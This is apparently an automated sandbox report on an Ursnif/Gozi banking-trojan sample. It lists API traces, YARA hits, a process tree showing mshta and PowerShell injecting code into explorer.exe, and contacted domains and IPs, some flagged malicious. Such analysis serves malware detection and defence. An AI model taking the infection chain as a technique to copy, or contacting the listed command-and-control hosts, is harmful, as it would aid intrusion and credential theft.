Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBB585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 2_2_05FBB585
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBCF2A GetSystemTimeAsFileTime,HeapFree, 2_2_05FBCF2A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 2_2_05FB7AFF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA3DD8 GetVersion,GetLastError, 2_2_05FA3DD8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Behavior Graph (ID: 343096, Sample: SecuriteInfo.com.Generic.mg..., Startdate: 22/01/2021, Architecture: WINDOWS, Score: 100)

Root-level findings: resolver1.opendns.com contacted; Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures.

Process tree recovered from the graph:

  • mshta.exe (Suspicious powershell command line found)
    • powershell.exe (Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 3 other signatures)
      dropped: C:\Users\user\AppData\Local\...\m5xmn43s.0.cs (UTF-8), C:\Users\user\AppData\...\fcanujkk.cmdline (UTF-8)
      • explorer.exe (injected; contacts c56.lepini.at and api3.lepini.at; Changes memory attributes in foreign processes to executable or writable; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; 2 other signatures)
        • cmd.exe (Uses ping.exe to sleep)
          • conhost.exe
          • PING.EXE
      • csc.exe (dropped C:\Users\user\AppData\Local\...\fcanujkk.dll, PE32)
        • cvtres.exe
      • csc.exe (dropped C:\Users\user\AppData\Local\...\m5xmn43s.dll, PE32)
        • cvtres.exe
      • conhost.exe
  • loaddll32.exe
    • regsvr32.exe (Detected Gozi e-Banking trojan; Writes or reads registry keys via WMI; Writes registry values via WMI)
      • control.exe
        • rundll32.exe
    • cmd.exe
      • iexplore.exe
        • iexplore.exe (contacts img.img-taboola.com; tls13.taboola.map.fastly.net 151.101.1.44, 443, 49759, 49760, FASTLYUS United States; 7 other IPs or domains)
        • iexplore.exe (contacts api10.laptok.at 45.138.24.6, 49792, 49793, 49796, SPECTRAIPSpectraIPBVNL Turkey)
        • iexplore.exe
        • iexplore.exe

Contacted Public IPs

IP            Domain   Country        ASN    ASN Name                Malicious
45.138.24.6   unknown  Turkey         62068  SPECTRAIPSpectraIPBVNL  true
151.101.1.44  unknown  United States  54113  FASTLYUS                false

Contacted Domains

Name IP Active
contextual.media.net 104.84.56.24 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 104.84.56.24 true
c56.lepini.at 45.138.24.6 true
lg3.media.net 104.84.56.24 true
resolver1.opendns.com 208.67.222.222 true
api3.lepini.at 45.138.24.6 true
api10.laptok.at 45.138.24.6 true
web.vortex.data.msn.com unknown unknown
www.msn.com unknown unknown
srtb.msn.com unknown unknown
img.img-taboola.com unknown unknown
cvision.media.net unknown unknown